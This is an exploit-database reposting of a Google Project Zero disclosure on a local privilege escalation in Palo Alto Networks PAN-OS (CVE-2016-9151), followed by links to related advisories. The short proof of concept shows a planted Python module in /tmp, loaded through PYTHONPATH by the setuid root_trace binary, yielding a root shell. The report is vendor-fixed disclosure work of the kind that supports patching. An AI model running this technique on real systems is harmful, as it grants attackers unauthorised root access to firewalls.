Lucene search
Google Security Research1337DAY-ID-26360HistoryNov 19, 2016 - 12:00 a.m.
Palo Alto Networks PanOS root_trace - Privilege Escalation Vulnerability
2016-11-1900:00:00
Google Security Research
0day.today
35
0.001 Low
EPSS
Percentile
26.2%
Exploit for linux platform in category local exploits
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67
# 0day.today [2018-02-19] #Related
openvas
openvas
Palo Alto PAN-OS Local Privilege Escalation (PAN-SA-2016-0034)
2016-11-21 00:00:00
nvd
nvd
CVE-2016-9151
2016-11-19 06:59:03
cvelist
cvelist
CVE-2016-9151
2016-11-19 06:29:00
zdt
zdt
Palo Alto Networks PanOS root_reboot - Privilege Escalation Vulnerability
2016-11-19 00:00:00
prion
prion
Code injection
2016-11-19 06:59:00
cve
cve
CVE-2016-9151
2016-11-19 06:59:03
paloalto
paloalto
Local Privilege Escalation
2016-11-17 17:00:00
